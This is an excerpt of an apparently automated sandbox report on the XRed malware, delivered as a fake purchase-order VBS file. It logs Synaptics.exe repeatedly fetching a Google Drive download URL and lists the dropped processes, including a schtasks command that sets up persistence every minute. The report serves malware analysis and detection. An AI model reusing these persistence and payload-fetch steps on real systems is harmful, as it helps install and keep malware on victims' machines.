                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:59 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:59 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-kxsfRqoGY-Fn2Ko13a0f0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                77192.168.2.450145142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:09:01 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:09:02 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:09:01 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-y2vDU8jim8pqKgN_dw2ztA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                78192.168.2.450143142.250.181.974436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:09:01 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:09:02 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC7Rk2pdi18vxEe0YfmVS3C9l96fONp5K9IwkWu-PRmFYhA_8wmelTCadjo72y0EEIjM
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:09:01 GMT
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-2orpwxhy03kheJwZTXAD2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:09:02 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                2024-12-25 08:09:02 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 41 6c 7a 78 6e 5f 6f 44 32 44 54 4d 32 6e 73 78 5a 2d 58 67 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="gAlzxn_oD2DTM2nsxZ-Xgg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                2024-12-25 08:09:02 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                79192.168.2.450146142.250.181.144436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:09:01 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:09:02 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:09:01 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-zKxQKyOuV1tVfdR7cyf65A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                80192.168.2.450144142.250.181.974436100C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-25 08:09:01 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:09:02 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC4qsokhAxUkHlHRW54fOnLCDU9cH1M5IvcQmpLO5t9vIGR21KNIfccPZeEOOBwmJ3Y3
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:09:02 GMT
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Agg0YvNVdaWnwZtvlcVOnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:09:02 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                2024-12-25 08:09:02 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 37 4d 49 6d 52 44 59 47 72 6a 59 73 41 6d 57 39 42 30 57 49 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="q7MImRDYGrjYsAmW9B0WIw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                2024-12-25 08:09:02 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Statistics

                                                                                                                                                                CPU Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Memory Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                Behavior

                                                                                                                                                                Click to jump to process

                                                                                                                                                                System Behavior

                                                                                                                                                                General

                                                                                                                                                                Target ID:0
                                                                                                                                                                Start time:03:06:55
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order No. G02873362-Docx.vbs"
                                                                                                                                                                Imagebase:0x7ff6fc7c0000
                                                                                                                                                                File size:170'496 bytes
                                                                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1762602570.0000022996705000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1762528484.0000022996FF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1761225232.00000229974E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1761289486.0000022996F9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1760645672.00000229972F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1760645672.00000229972F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:1
                                                                                                                                                                Start time:03:07:03
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:1'688'576 bytes
                                                                                                                                                                MD5 hash:019FC60427D0126ADFEC88980C7FB666
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, Author: Joe Security
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:3
                                                                                                                                                                Start time:03:07:13
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:1'688'576 bytes
                                                                                                                                                                MD5 hash:019FC60427D0126ADFEC88980C7FB666
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:6
                                                                                                                                                                Start time:03:07:14
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:1'688'576 bytes
                                                                                                                                                                MD5 hash:019FC60427D0126ADFEC88980C7FB666
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:7
                                                                                                                                                                Start time:03:07:14
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"
                                                                                                                                                                Imagebase:0x1e0000
                                                                                                                                                                File size:916'992 bytes
                                                                                                                                                                MD5 hash:E18974062E92D1E85871E1BE1487F6DC
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                • Detection: 53%, ReversingLabs
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:8
                                                                                                                                                                Start time:03:07:15
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:771'584 bytes
                                                                                                                                                                MD5 hash:1D45B99034D67448EBF0776BD5699C84
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:9
                                                                                                                                                                Start time:03:07:15
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                Imagebase:0xdb0000
                                                                                                                                                                File size:53'161'064 bytes
                                                                                                                                                                MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:10
                                                                                                                                                                Start time:03:07:16
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:11
                                                                                                                                                                Start time:03:07:16
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
